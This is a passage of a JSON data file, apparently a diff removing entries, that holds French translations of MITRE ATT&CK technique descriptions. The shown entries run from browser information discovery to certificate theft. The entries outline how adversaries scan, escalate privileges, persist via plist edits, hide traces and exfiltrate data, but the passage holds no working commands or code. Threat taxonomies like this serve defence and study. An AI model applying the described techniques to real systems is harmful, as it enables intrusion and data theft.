pour en savoir plus sur les environnements compromis. Les donn\u00e9es enregistr\u00e9es par les navigateurs (telles que les signets, les comptes et l\u2019historique de navigation) peuvent r\u00e9v\u00e9ler une vari\u00e9t\u00e9 de renseignements personnels sur les utilisateurs (par exemple, les sites bancaires, les relations / int\u00e9r\u00eats, les m\u00e9dias sociaux, etc.) ainsi que des d\u00e9tails sur les ressources du r\u00e9seau interne telles que les serveurs, les outils / tableaux de bord ou toute autre infrastructure connexe. (Citation : Kaspersky Autofill) Les informations du navigateur peuvent \u00e9galement mettre en \u00e9vidence des cibles suppl\u00e9mentaires apr\u00e8s qu\u2019un adversaire a acc\u00e8s \u00e0 des informations d\u2019identification valides, en particulier [Informations d\u2019identification dans les fichiers](https://attack.mitre.org/techniques/T1552/001) associ\u00e9es aux connexions mises en cache par un navigateur. Les emplacements de stockage sp\u00e9cifiques varient en fonction de la plate-forme et/ou de l\u2019application, mais les informations du navigateur sont g\u00e9n\u00e9ralement stock\u00e9es dans des fichiers et des bases de donn\u00e9es locaux (par exemple, '%APPDATA%/Google/Chrome'). (Citation : Profils d\u2019itin\u00e9rance Chrome)\nhttps://attack.mitre.org/techniques/T1217\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1092 - Communication par support amovible", - "description": "Les adversaires peuvent effectuer des commandes et des contr\u00f4les entre des h\u00f4tes compromis sur des r\u00e9seaux potentiellement d\u00e9connect\u00e9s \u00e0 l\u2019aide de supports amovibles pour transf\u00e9rer des commandes d\u2019un syst\u00e8me \u00e0 l\u2019autre. Les deux syst\u00e8mes devraient \u00eatre compromis, avec la probabilit\u00e9 qu\u2019un syst\u00e8me connect\u00e9 \u00e0 Internet soit compromis d\u2019abord et le second par un mouvement lat\u00e9ral par [R\u00e9plication par support amovible](https://attack.mitre.org/techniques/T1091). Les commandes et les fichiers seraient relay\u00e9s du syst\u00e8me d\u00e9connect\u00e9 au syst\u00e8me connect\u00e9 \u00e0 Internet auquel l\u2019adversaire a un acc\u00e8s direct.\nhttps://attack.mitre.org/techniques/T1092\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1222 - Modification des autorisations de fichiers et de r\u00e9pertoires", - "description": "Les adversaires peuvent modifier les autorisations/attributs de fichiers ou de r\u00e9pertoires pour \u00e9chapper aux listes de contr\u00f4le d\u2019acc\u00e8s (ACL) et acc\u00e9der aux fichiers prot\u00e9g\u00e9s. (R\u00e9f\u00e9rence : Hybrid Analysis Icacls1 juin 2018) (Citation : Hybrid Analysis icacls2 mai 2018) Les autorisations de fichiers et de r\u00e9pertoires sont g\u00e9n\u00e9ralement g\u00e9r\u00e9es par des listes de contr\u00f4le d\u2019acc\u00e8s configur\u00e9es par le propri\u00e9taire du fichier ou du r\u00e9pertoire, ou par les utilisateurs disposant des autorisations appropri\u00e9es. Les impl\u00e9mentations d\u2019ACL de fichiers et de r\u00e9pertoires varient selon la plate-forme, mais d\u00e9signent g\u00e9n\u00e9ralement explicitement quels utilisateurs ou groupes peuvent effectuer quelles actions (lecture, \u00e9criture, ex\u00e9cution, etc.). Les modifications peuvent inclure la modification de droits d\u2019acc\u00e8s sp\u00e9cifiques, ce qui peut n\u00e9cessiter la prise de possession d\u2019un fichier ou d\u2019un r\u00e9pertoire et/ou des autorisations \u00e9lev\u00e9es en fonction des autorisations existantes du fichier ou du r\u00e9pertoire. Cela peut permettre des activit\u00e9s malveillantes telles que la modification, le remplacement ou la suppression de fichiers ou de r\u00e9pertoires sp\u00e9cifiques. Des modifications sp\u00e9cifiques de fichiers et de r\u00e9pertoires peuvent \u00eatre une \u00e9tape requise pour de nombreuses techniques, telles que l\u2019\u00e9tablissement de la persistance via [Fonctionnalit\u00e9s d\u2019accessibilit\u00e9](https://attack.mitre.org/techniques/T1546/008), [Scripts d\u2019initialisation de d\u00e9marrage ou d\u2019ouverture de session](https://attack.mitre.org/techniques/T1037), [Modification de la configuration du shell Unix] (https://attack.mitre.org/techniques/T1546/004), ou la neutralisation/d\u00e9tournement d\u2019autres fichiers binaires/de configuration instrumentaux via [Ex\u00e9cution Hijack Flux](https://attack.mitre.org/techniques/T1574). Les adversaires peuvent \u00e9galement modifier les autorisations des liens symboliques. Par exemple, les logiciels malveillants (en particulier les ran\u00e7ongiciels) peuvent modifier les liens symboliques et les param\u00e8tres associ\u00e9s pour permettre l\u2019acc\u00e8s aux fichiers \u00e0 partir de raccourcis locaux avec des chemins distants. (R\u00e9f\u00e9rence : new_rust_based_ransomware) (R\u00e9f\u00e9rence : bad_luck_blackcat) (R\u00e9f\u00e9rence : falconoverwatch_blackcat_attack) (R\u00e9f\u00e9rence : blackmatter_blackcat) (R\u00e9f\u00e9rence : fsutil_behavior)\nhttps://attack.mitre.org/techniques/T1222\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1595 - Analyse active", - "description": "Les adversaires peuvent ex\u00e9cuter des analyses de reconnaissance actives pour recueillir des informations qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Les analyses actives sont celles o\u00f9 l\u2019adversaire sonde l\u2019infrastructure de la victime via le trafic r\u00e9seau, par opposition \u00e0 d\u2019autres formes de reconnaissance qui n\u2019impliquent pas d\u2019interaction directe. Les adversaires peuvent effectuer diff\u00e9rentes formes d\u2019analyse active en fonction des informations qu\u2019ils cherchent \u00e0 recueillir. Ces analyses peuvent \u00e9galement \u00eatre effectu\u00e9es de diff\u00e9rentes mani\u00e8res, notamment \u00e0 l\u2019aide de fonctionnalit\u00e9s natives de protocoles r\u00e9seau tels que ICMP. (Citation : Botnet Scan) (Citation : Empreintes digitales OWASP) Les informations issues de ces analyses peuvent r\u00e9v\u00e9ler des possibilit\u00e9s d\u2019autres formes de reconnaissance (ex: [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche dans des bases de donn\u00e9es techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (ex: [D\u00e9velopper des capacit\u00e9s](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacit\u00e9s](https://attack.mitre.org/techniques/T1588)), et/ou d\u2019acc\u00e8s initial (ex: [Externe \u00e0 distance Services](https://attack.mitre.org/techniques/T1133) ou [Exploiter une application publique](https://attack.mitre.org/techniques/T1190)).\nhttps://attack.mitre.org/techniques/T1595\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1548 - M\u00e9canisme de contr\u00f4le d\u2019\u00e9l\u00e9vation d\u2019abus", - "description": "Les adversaires peuvent contourner les m\u00e9canismes con\u00e7us pour contr\u00f4ler les privil\u00e8ges \u00e9lev\u00e9s afin d\u2019obtenir des autorisations de niveau sup\u00e9rieur. La plupart des syst\u00e8mes modernes contiennent des m\u00e9canismes natifs de contr\u00f4le d\u2019\u00e9l\u00e9vation destin\u00e9s \u00e0 limiter les privil\u00e8ges qu\u2019un utilisateur peut exercer sur une machine. L\u2019autorisation doit \u00eatre accord\u00e9e \u00e0 des utilisateurs sp\u00e9cifiques afin d\u2019effectuer des t\u00e2ches qui peuvent \u00eatre consid\u00e9r\u00e9es comme pr\u00e9sentant un risque plus \u00e9lev\u00e9. Un adversaire peut ex\u00e9cuter plusieurs m\u00e9thodes pour tirer parti des m\u00e9canismes de contr\u00f4le int\u00e9gr\u00e9s afin d\u2019augmenter les privil\u00e8ges sur un syst\u00e8me.\nhttps://attack.mitre.org/techniques/T1548\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1125 - Capture vid\u00e9o", - "description": "Un adversaire peut tirer parti des p\u00e9riph\u00e9riques d\u2019un ordinateur (p. ex., cam\u00e9ras ou webcams int\u00e9gr\u00e9es) ou de ses applications (p. ex., services d\u2019appels vid\u00e9o) pour capturer des enregistrements vid\u00e9o dans le but de recueillir de l\u2019information. Les images peuvent \u00e9galement \u00eatre captur\u00e9es \u00e0 partir d\u2019appareils ou d\u2019applications, potentiellement \u00e0 des intervalles sp\u00e9cifi\u00e9s, au lieu de fichiers vid\u00e9o. Des logiciels malveillants ou des scripts peuvent \u00eatre utilis\u00e9s pour interagir avec les appareils via une API disponible fournie par le syst\u00e8me d\u2019exploitation ou une application pour capturer des vid\u00e9os ou des images. Les fichiers vid\u00e9o ou image peuvent \u00eatre \u00e9crits sur le disque et exfiltr\u00e9s ult\u00e9rieurement. Cette technique diff\u00e8re de [Capture d\u2019\u00e9cran](https://attack.mitre.org/techniques/T1113) en raison de l\u2019utilisation de dispositifs ou d\u2019applications sp\u00e9cifiques pour l\u2019enregistrement vid\u00e9o plut\u00f4t que pour la capture de l\u2019\u00e9cran de la victime. Dans macOS, il existe quelques \u00e9chantillons de logiciels malveillants diff\u00e9rents qui enregistrent la webcam de l\u2019utilisateur, tels que FruitFly et Proton. (Citation : objectif-voir revue 2017)\nhttps://attack.mitre.org/techniques/T1125\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1016 - D\u00e9couverte de la configuration du r\u00e9seau syst\u00e8me", - "description": "Les adversaires peuvent rechercher des d\u00e9tails sur la configuration et les param\u00e8tres du r\u00e9seau, tels que les adresses IP et/ou MAC, des syst\u00e8mes auxquels ils acc\u00e8dent ou via la d\u00e9couverte d\u2019informations de syst\u00e8mes distants. Il existe plusieurs utilitaires d\u2019administration de syst\u00e8me d\u2019exploitation qui peuvent \u00eatre utilis\u00e9s pour recueillir ces informations. Les exemples incluent [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102) et [route](https://attack.mitre.org/software/S0103). Les adversaires peuvent \u00e9galement tirer parti d\u2019une [interface de ligne de commande de p\u00e9riph\u00e9rique r\u00e9seau](https://attack.mitre.org/techniques/T1059/008) sur les p\u00e9riph\u00e9riques r\u00e9seau pour recueillir des informations sur les configurations et les param\u00e8tres, telles que les adresses IP des interfaces configur\u00e9es et les routes statiques/dynamiques (par exemple, show ip route, show ip interface). (R\u00e9f\u00e9rence : US-CERT-TA18-106A) (Citation : Mandiant APT41 Global Intrusion) Les adversaires peuvent utiliser les informations de [D\u00e9couverte de la configuration r\u00e9seau syst\u00e8me](https://attack.mitre.org/techniques/T1016) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris la d\u00e9termination de certains acc\u00e8s au sein du r\u00e9seau cible et les actions \u00e0 effectuer ensuite.\nhttps://attack.mitre.org/techniques/T1016\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1087 - D\u00e9couverte de compte", - "description": "Les adversaires peuvent tenter d\u2019obtenir une liste de comptes, noms d\u2019utilisateur ou adresses e-mail valides sur un syst\u00e8me ou dans un environnement compromis. Ces informations peuvent aider les adversaires \u00e0 d\u00e9terminer quels comptes existent, ce qui peut faciliter les comportements de suivi tels que le for\u00e7age brut, les attaques de spear-phishing ou les prises de contr\u00f4le de compte (par exemple, [Comptes valides](https://attack.mitre.org/techniques/T1078)). Les adversaires peuvent utiliser plusieurs m\u00e9thodes pour \u00e9num\u00e9rer les comptes, notamment l\u2019utilisation abusive d\u2019outils existants, les commandes int\u00e9gr\u00e9es et les erreurs de configuration potentielles qui divulguent des noms de compte et des r\u00f4les ou des autorisations dans l\u2019environnement cibl\u00e9. Par exemple, les environnements cloud fournissent g\u00e9n\u00e9ralement des interfaces facilement accessibles pour obtenir des listes d\u2019utilisateurs. Sur les h\u00f4tes, les adversaires peuvent utiliser [PowerShell](https://attack.mitre.org/techniques/T1059/001) par d\u00e9faut et d\u2019autres fonctionnalit\u00e9s de ligne de commande pour identifier les comptes. Les informations sur les adresses e-mail et les comptes peuvent \u00e9galement \u00eatre extraites en recherchant les fichiers d\u2019un syst\u00e8me infect\u00e9.\nhttps://attack.mitre.org/techniques/T1087\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1090 - Procuration", - "description": "Les adversaires peuvent utiliser un proxy de connexion pour diriger le trafic r\u00e9seau entre les syst\u00e8mes ou agir en tant qu\u2019interm\u00e9diaire pour les communications r\u00e9seau avec un serveur de commande et de contr\u00f4le afin d\u2019\u00e9viter les connexions directes \u00e0 leur infrastructure. Il existe de nombreux outils qui permettent la redirection du trafic via des proxys ou la redirection de port, notamment [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy et ZXPortMap. (Citation : Outils d\u2019attaque APT de Trend Micro) Les adversaires utilisent ces types de proxys pour g\u00e9rer les communications de commande et de contr\u00f4le, r\u00e9duire le nombre de connexions r\u00e9seau sortantes simultan\u00e9es, fournir une r\u00e9silience face \u00e0 la perte de connexion ou pour contourner les chemins de communication fiables existants entre les victimes afin d\u2019\u00e9viter les soup\u00e7ons. Les adversaires peuvent encha\u00eener plusieurs proxys pour dissimuler davantage la source du trafic malveillant. Les adversaires peuvent \u00e9galement tirer parti des sch\u00e9mas de routage dans les r\u00e9seaux de diffusion de contenu (CDN) pour commander et contr\u00f4ler le trafic par proxy.\nhttps://attack.mitre.org/techniques/T1090\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1059 - Interpr\u00e9teur de commandes et de scripts", - "description": "Les adversaires peuvent abuser des interpr\u00e9teurs de commandes et de scripts pour ex\u00e9cuter des commandes, des scripts ou des fichiers binaires. Ces interfaces et langages fournissent des moyens d\u2019interagir avec les syst\u00e8mes informatiques et sont une caract\u00e9ristique commune \u00e0 de nombreuses plates-formes diff\u00e9rentes. La plupart des syst\u00e8mes sont livr\u00e9s avec une interface de ligne de commande int\u00e9gr\u00e9e et des capacit\u00e9s de script, par exemple, les distributions macOS et Linux incluent une certaine saveur de [Unix Shell](https://attack.mitre.org/techniques/T1059/004) tandis que les installations Windows incluent [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) et [PowerShell](https://attack.mitre.org/techniques/T1059/001). Il existe \u00e9galement des interpr\u00e9teurs multiplateformes tels que [Python](https://attack.mitre.org/techniques/T1059/006), ainsi que ceux couramment associ\u00e9s aux applications clientes telles que [JavaScript](https://attack.mitre.org/techniques/T1059/007) et [Visual Basic](https://attack.mitre.org/techniques/T1059/005). Les adversaires peuvent abuser de ces technologies de diverses mani\u00e8res pour ex\u00e9cuter des commandes arbitraires. Les commandes et les scripts peuvent \u00eatre int\u00e9gr\u00e9s dans les charges utiles [Acc\u00e8s initial](https://attack.mitre.org/tactics/TA0001) livr\u00e9es aux victimes sous forme de documents de leurre ou de charges utiles secondaires t\u00e9l\u00e9charg\u00e9es \u00e0 partir d\u2019un C2 existant. Les adversaires peuvent \u00e9galement ex\u00e9cuter des commandes via des terminaux / shells interactifs, ainsi que d\u2019utiliser divers [services \u00e0 distance](https://attack.mitre.org/techniques/T1021) afin de r\u00e9aliser l\u2019ex\u00e9cution \u00e0 distance. (Citation : Commandes \u00e0 distance Powershell) (Citation : Cisco IOS Software Integrity Assurance - Historique des commandes) (Citation: Ex\u00e9cution de shell \u00e0 distance en Python)\nhttps://attack.mitre.org/techniques/T1059\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1482 - D\u00e9couverte de l\u2019approbation de domaine", - "description": "Les adversaires peuvent tenter de recueillir des informations sur les relations d\u2019approbation de domaine qui peuvent \u00eatre utilis\u00e9es pour identifier les opportunit\u00e9s de mouvement lat\u00e9ral dans les environnements multidomaines/for\u00eats Windows. Les approbations de domaine fournissent un m\u00e9canisme permettant \u00e0 un domaine d\u2019autoriser l\u2019acc\u00e8s aux ressources en fonction des proc\u00e9dures d\u2019authentification d\u2019un autre domaine. (Citation : Microsoft Trusts) Les approbations de domaine permettent aux utilisateurs du domaine approuv\u00e9 d\u2019acc\u00e9der aux ressources du domaine approuv\u00e9. L\u2019information d\u00e9couverte peut aider l\u2019adversaire \u00e0 mener [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) et [Kerberoasting](https://attack.mitre.org/techniques/T1558/003). (Citation : AdSecurity Forging Trust Tickets) (Citation: Harmj0y Domain Trusts) Les approbations de domaine peuvent \u00eatre \u00e9num\u00e9r\u00e9es \u00e0 l\u2019aide de l\u2019appel d\u2019API Win32 'DSEnumerateDomainTrusts()', des m\u00e9thodes .NET et LDAP. (Citation: Harmj0y Domain Trusts) L\u2019utilitaire Windows [Nltest](https://attack.mitre.org/software/S0359) est connu pour \u00eatre utilis\u00e9 par des adversaires pour \u00e9num\u00e9rer les approbations de domaine. (Citation : Microsoft Operation Wilysupply)\nhttps://attack.mitre.org/techniques/T1482\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1020 - Exfiltration automatis\u00e9e", - "description": "Les adversaires peuvent exfiltrer des donn\u00e9es, telles que des documents sensibles, gr\u00e2ce \u00e0 l\u2019utilisation d\u2019un traitement automatis\u00e9 apr\u00e8s avoir \u00e9t\u00e9 collect\u00e9es pendant la collecte. Lorsque l\u2019exfiltration automatis\u00e9e est utilis\u00e9e, d\u2019autres techniques d\u2019exfiltration s\u2019appliquent probablement aussi bien pour transf\u00e9rer l\u2019information hors du r\u00e9seau, comme [Exfiltration sur canal C2](https://attack.mitre.org/techniques/T1041) et [Exfiltration sur un protocole alternatif](https://attack.mitre.org/techniques/T1048).\nhttps://attack.mitre.org/techniques/T1020\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1070 - Suppression de l\u2019indicateur", - "description": "Les adversaires peuvent supprimer ou modifier les artefacts g\u00e9n\u00e9r\u00e9s dans les syst\u00e8mes pour supprimer les preuves de leur pr\u00e9sence ou entraver les d\u00e9fenses. Divers artefacts peuvent \u00eatre cr\u00e9\u00e9s par un adversaire ou quelque chose qui peut \u00eatre attribu\u00e9 aux actions d\u2019un adversaire. G\u00e9n\u00e9ralement, ces artefacts sont utilis\u00e9s comme indicateurs d\u00e9fensifs li\u00e9s aux \u00e9v\u00e9nements surveill\u00e9s, tels que les cha\u00eenes des fichiers t\u00e9l\u00e9charg\u00e9s, les journaux g\u00e9n\u00e9r\u00e9s \u00e0 partir des actions de l\u2019utilisateur et d\u2019autres donn\u00e9es analys\u00e9es par les d\u00e9fenseurs. L\u2019emplacement, le format et le type d\u2019artefact (tels que l\u2019historique des commandes ou des connexions) sont souvent sp\u00e9cifiques \u00e0 chaque plate-forme. La suppression de ces indicateurs peut interf\u00e9rer avec la collecte d\u2019\u00e9v\u00e9nements, les rapports ou d\u2019autres processus utilis\u00e9s pour d\u00e9tecter les activit\u00e9s d\u2019intrusion. Cela peut compromettre l\u2019int\u00e9grit\u00e9 des solutions de s\u00e9curit\u00e9 en faisant en sorte que des \u00e9v\u00e9nements notables ne soient pas signal\u00e9s. Cette activit\u00e9 peut \u00e9galement entraver l\u2019analyse m\u00e9dico-l\u00e9gale et l\u2019intervention en cas d\u2019incident, en raison du manque de donn\u00e9es suffisantes pour d\u00e9terminer ce qui s\u2019est pass\u00e9.\nhttps://attack.mitre.org/techniques/T1070\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1609 - Commande d\u2019administration de conteneur", - "description": "Les adversaires peuvent abuser d\u2019un service d\u2019administration de conteneur pour ex\u00e9cuter des commandes dans un conteneur. Un service d\u2019administration de conteneurs tel que le d\u00e9mon Docker, le serveur API Kubernetes ou le kubelet peut permettre la gestion \u00e0 distance des conteneurs dans un environnement. (Citation : Docker Daemon CLI) (Citation : API Kubernetes) (Citation : Kubernetes Kubelet) Dans Docker, les adversaires peuvent sp\u00e9cifier un point d\u2019entr\u00e9e pendant le d\u00e9ploiement du conteneur qui ex\u00e9cute un script ou une commande, ou ils peuvent utiliser une commande telle que docker exec pour ex\u00e9cuter une commande dans un conteneur en cours d\u2019ex\u00e9cution. (R\u00e9f\u00e9rence : Point d\u2019entr\u00e9e Docker) (R\u00e9f\u00e9rence : Docker Exec) Dans Kubernetes, si un adversaire dispose d\u2019autorisations suffisantes, il peut obtenir une ex\u00e9cution \u00e0 distance dans un conteneur du cluster via une interaction avec le serveur API Kubernetes, le kubelet, ou en ex\u00e9cutant une commande telle que kubectl exec. (Citation : Kubectl Exec Get Shell)\nhttps://attack.mitre.org/techniques/T1609\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1083 - D\u00e9couverte de fichiers et de r\u00e9pertoires", - "description": "Les adversaires peuvent \u00e9num\u00e9rer des fichiers et des r\u00e9pertoires ou rechercher certaines informations dans un syst\u00e8me de fichiers \u00e0 des emplacements sp\u00e9cifiques d\u2019un h\u00f4te ou d\u2019un partage r\u00e9seau. Les adversaires peuvent utiliser les informations de [D\u00e9couverte de fichiers et de r\u00e9pertoires](https://attack.mitre.org/techniques/T1083) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques. De nombreux utilitaires d\u2019interface de commande peuvent \u00eatre utilis\u00e9s pour obtenir ces informations. Les exemples incluent dir, tree, ls, find et locate. (Citation : Commandes Windows JPCERT) Des outils personnalis\u00e9s peuvent \u00e9galement \u00eatre utilis\u00e9s pour collecter des informations sur les fichiers et les r\u00e9pertoires et interagir avec [l\u2019API native](https://attack.mitre.org/techniques/T1106). Les adversaires peuvent \u00e9galement tirer parti d\u2019une [interface de ligne de commande de p\u00e9riph\u00e9rique r\u00e9seau](https://attack.mitre.org/techniques/T1059/008) sur les p\u00e9riph\u00e9riques r\u00e9seau pour collecter des informations sur les fichiers et les r\u00e9pertoires (par exemple, dir, show flash et/ou nvram). (R\u00e9f\u00e9rence : US-CERT-TA18-106A)\nhttps://attack.mitre.org/techniques/T1083\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1568 - R\u00e9solution dynamique", - "description": "Les adversaires peuvent \u00e9tablir dynamiquement des connexions \u00e0 l\u2019infrastructure de commandement et de contr\u00f4le pour \u00e9chapper aux d\u00e9tections et aux mesures correctives courantes. Cela peut \u00eatre r\u00e9alis\u00e9 en utilisant un logiciel malveillant qui partage un algorithme commun avec l\u2019infrastructure utilis\u00e9e par l\u2019adversaire pour recevoir les communications du logiciel malveillant. Ces calculs peuvent \u00eatre utilis\u00e9s pour ajuster dynamiquement des param\u00e8tres tels que le nom de domaine, l\u2019adresse IP ou le num\u00e9ro de port utilis\u00e9 par le logiciel malveillant pour la commande et le contr\u00f4le. Les adversaires peuvent utiliser la r\u00e9solution dynamique aux fins des [canaux de secours](https://attack.mitre.org/techniques/T1008). Lorsque le contact est perdu avec le serveur de commande et de contr\u00f4le principal, les logiciels malveillants peuvent utiliser la r\u00e9solution dynamique comme moyen de r\u00e9tablir la commande et le contr\u00f4le. (Citation: Talos CCleanup 2017) (Citation: FireEye POSHSPY avril 2017) (Citation : ESET Sednit 2017 Activity)\nhttps://attack.mitre.org/techniques/T1568\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1647 - Modification du fichier Plist", - "description": "Les adversaires peuvent modifier les fichiers de liste de propri\u00e9t\u00e9s (fichiers plist) pour permettre d\u2019autres activit\u00e9s malveillantes, tout en \u00e9vitant et en contournant potentiellement les d\u00e9fenses du syst\u00e8me. Les applications macOS utilisent des fichiers plist, tels que le fichier info.plist, pour stocker les propri\u00e9t\u00e9s et les param\u00e8tres de configuration qui indiquent au syst\u00e8me d\u2019exploitation comment g\u00e9rer l\u2019application au moment de l\u2019ex\u00e9cution. Les fichiers Plist sont des m\u00e9tadonn\u00e9es structur\u00e9es dans des paires cl\u00e9-valeur format\u00e9es en XML bas\u00e9es sur Core Foundation DTD d\u2019Apple. Les fichiers Plist peuvent \u00eatre enregistr\u00e9s au format texte ou binaire. (Citation: fileinfo plist description du fichier) Les adversaires peuvent modifier les paires cl\u00e9-valeur dans les fichiers plist pour influencer les comportements du syst\u00e8me, par exemple en masquant l\u2019ex\u00e9cution d\u2019une application (c\u2019est-\u00e0-dire [Fen\u00eatre cach\u00e9e](https://attack.mitre.org/techniques/T1564/003)) ou en ex\u00e9cutant des commandes suppl\u00e9mentaires pour la persistance (ex: [Agent de lancement](https://attack.mitre.org/techniques/T1543/001)/[Lancer le d\u00e9mon](https://attack.mitre.org/techniques/T1543/004) ou [Applications rouvertes](https://attack.mitre.org/techniques/T1547/007)). Par exemple, les adversaires peuvent ajouter un chemin d\u2019application malveillant au fichier '~/Library/Preferences/com.apple.dock.plist', qui contr\u00f4le les applications qui apparaissent dans le Dock. Les adversaires peuvent \u00e9galement modifier la cl\u00e9 LSUIElement dans le fichier info.plist d\u2019une application pour ex\u00e9cuter l\u2019application en arri\u00e8re-plan. Les adversaires peuvent \u00e9galement ins\u00e9rer des paires cl\u00e9-valeur pour ins\u00e9rer des variables d\u2019environnement, telles que LSEnvironment, afin d\u2019activer la persistance via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006). (Citation : persistance de wardle chp2) (R\u00e9f\u00e9rence : eset_osx_flashback)\nhttps://attack.mitre.org/techniques/T1647\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1074 - Donn\u00e9es mises en sc\u00e8ne", - "description": "Les adversaires peuvent organiser les donn\u00e9es collect\u00e9es dans un emplacement central ou un r\u00e9pertoire avant l\u2019Exfiltration. Les donn\u00e9es peuvent \u00eatre conserv\u00e9es dans des fichiers s\u00e9par\u00e9s ou combin\u00e9es en un seul fichier gr\u00e2ce \u00e0 des techniques telles que [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Des shells de commande interactifs peuvent \u00eatre utilis\u00e9s, et des fonctionnalit\u00e9s communes dans [cmd](https://attack.mitre.org/software/S0106) et bash peuvent \u00eatre utilis\u00e9es pour copier des donn\u00e9es dans un emplacement interm\u00e9diaire. (Citation : PWC Cloud Hopper avril 2017) Dans les environnements cloud, les adversaires peuvent transf\u00e9rer des donn\u00e9es dans une instance ou une machine virtuelle particuli\u00e8re avant l\u2019exfiltration. Un adversaire peut [Cr\u00e9er une instance cloud](https://attack.mitre.org/techniques/T1578/002) et mettre en sc\u00e8ne des donn\u00e9es dans cette instance. (Citation: Mandiant M-Trends 2020) Les adversaires peuvent choisir de transf\u00e9rer les donn\u00e9es d\u2019un r\u00e9seau victime dans un emplacement centralis\u00e9 avant Exfiltration afin de minimiser le nombre de connexions \u00e9tablies \u00e0 leur serveur C2 et de mieux \u00e9chapper \u00e0 la d\u00e9tection.\nhttps://attack.mitre.org/techniques/T1074\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1649 - Voler ou falsifier des certificats d\u2019authentification", - "description": "Les adversaires peuvent voler ou falsifier les certificats utilis\u00e9s pour l\u2019authentification afin d\u2019acc\u00e9der \u00e0 des syst\u00e8mes ou des ressources distants. Les certificats num\u00e9riques sont souvent utilis\u00e9s pour signer et chiffrer des messages et/ou des fichiers. Les certificats sont \u00e9galement utilis\u00e9s comme mat\u00e9riel d\u2019authentification. Par exemple, les certificats d\u2019appareil Azure AD et les certificats des services de certificats Active Directory (AD CS) se lient \u00e0 une identit\u00e9 et peuvent \u00eatre utilis\u00e9s comme informations d\u2019identification pour les comptes de domaine. (Citation : O365 Blog Azure AD Device IDs) (Citation : Vue d\u2019ensemble de Microsoft AD CS) Les certificats d\u2019authentification peuvent \u00eatre \u00e0 la fois vol\u00e9s et falsifi\u00e9s. Par exemple, les certificats AD CS peuvent \u00eatre vol\u00e9s \u00e0 partir d\u2019un stockage chiffr\u00e9 (dans le Registre ou des fichiers)(Citation : APT29 Deep Look at Credential Roaming), de fichiers de certificats \u00e9gar\u00e9s (c\u2019est-\u00e0-dire [Informations d\u2019identification non s\u00e9curis\u00e9es](https://attack.mitre.org/techniques/T1552)), ou directement \u00e0 partir du magasin de certificats Windows via diverses API de chiffrement. (Citation : SpecterOps Certified Pre Owned) (R\u00e9f\u00e9rence : GitHub CertStealer) (Citation : Certificats GitHub GhostPack) Avec les droits d\u2019inscription appropri\u00e9s, les utilisateurs et/ou les ordinateurs d\u2019un domaine peuvent \u00e9galement demander et/ou renouveler manuellement des certificats aupr\u00e8s des autorit\u00e9s de certification d\u2019entreprise. Ce processus d\u2019inscription d\u00e9finit divers param\u00e8tres et autorisations associ\u00e9s au certificat. Il convient de noter que les valeurs EKU (Extended Key Usage) du certificat d\u00e9finissent les cas d\u2019utilisation de signature, de chiffrement et d\u2019authentification, tandis que les valeurs SAN (Subject Alternative Name) du certificat d\u00e9finissent les noms alternatifs du propri\u00e9taire du certificat. (Citation : Medium Certified Pre Owned) L\u2019utilisation abusive de certificats pour les informations d\u2019authentification peut activer d\u2019autres comportements tels que [Mouvement lat\u00e9ral](https://attack.mitre.org/tactics/TA0008). Les erreurs de configuration li\u00e9es aux certificats peuvent \u00e9galement permettre une [escalade des privil\u00e8ges](https://attack.mitre.org/tactics/TA0004), en permettant aux utilisateurs d\u2019emprunter l\u2019identit\u00e9 ou d\u2019assumer des comptes ou des autorisations privil\u00e9gi\u00e9s via les identit\u00e9s (SAN) associ\u00e9es \u00e0 un certificat. Ces abus peuvent \u00e9galement permettre [Persistence](https://attack.mitre.org/tactics/TA0003) via le vol ou la falsification de certificats qui peuvent \u00eatre utilis\u00e9s comme [comptes valides](https://attack.mitre.org/techniques/T1078) pendant la dur\u00e9e de validit\u00e9 du certificat, malgr\u00e9 la r\u00e9initialisation du mot de passe utilisateur. Les certificats d\u2019authentification peuvent \u00e9galement \u00eatre 